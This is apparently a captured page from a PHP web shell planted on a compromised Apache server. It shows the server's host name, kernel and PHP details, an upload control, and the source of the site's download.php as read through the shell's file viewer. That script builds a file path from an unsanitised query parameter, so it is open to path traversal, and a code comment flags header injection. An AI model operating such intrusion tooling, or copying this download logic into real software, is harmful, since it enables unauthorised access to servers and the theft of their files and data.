( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
$ pwd: /var/www/html/tmpr/../tmpr/../tmpr/../tmpr/../
Upload Files
File: /var/www/html/tmpr/..//tmpr/..//tmpr/../tmpr/..//download.php
<?php
include("includes/limittext.php");
include('Connections/videoondemand.php');  
require("DbSql.inc.php");
require("NewsSql.inc.php");
require_once('gd2imaging.php');

$db = new NewsSQL($DBName); 
error_reporting(0);/*error_reporting(E_ALL);
ini_set('display_errors', 1);*/
/*set_time_limit(0) ;*/
function filter($arr) {
    global $link;
return array_map(array($link, 'real_escape_string'), $arr);
}

$_GET = filter($_GET);
$_POST = filter($_POST); 
$output=$_GET["output"];



// Force download of image file specified in URL query string and which
// is in the same directory as the download.php script.

if(empty($_GET['output'])) {
   header("HTTP/1.0 404 Not Found");
   return;
}




$filename = "v/uploads/raw/".$output;
$mime = ($mime = getimagesize($filename)) ? $mime['mime'] : $mime;
$size = filesize($filename);
$fp   = fopen($filename, "rb");
if (!($mime && $size && $fp)) {
  // Error.
  return;
}

header("Content-type: " . $mime);
header("Content-Length: " . $size);
// NOTE: Possible header injection via $basename
header("Content-Disposition: attachment; filename=" . $output);
header('Content-Transfer-Encoding: binary');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
fpassthru($fp);

header("Location: index.php");
@ Telegram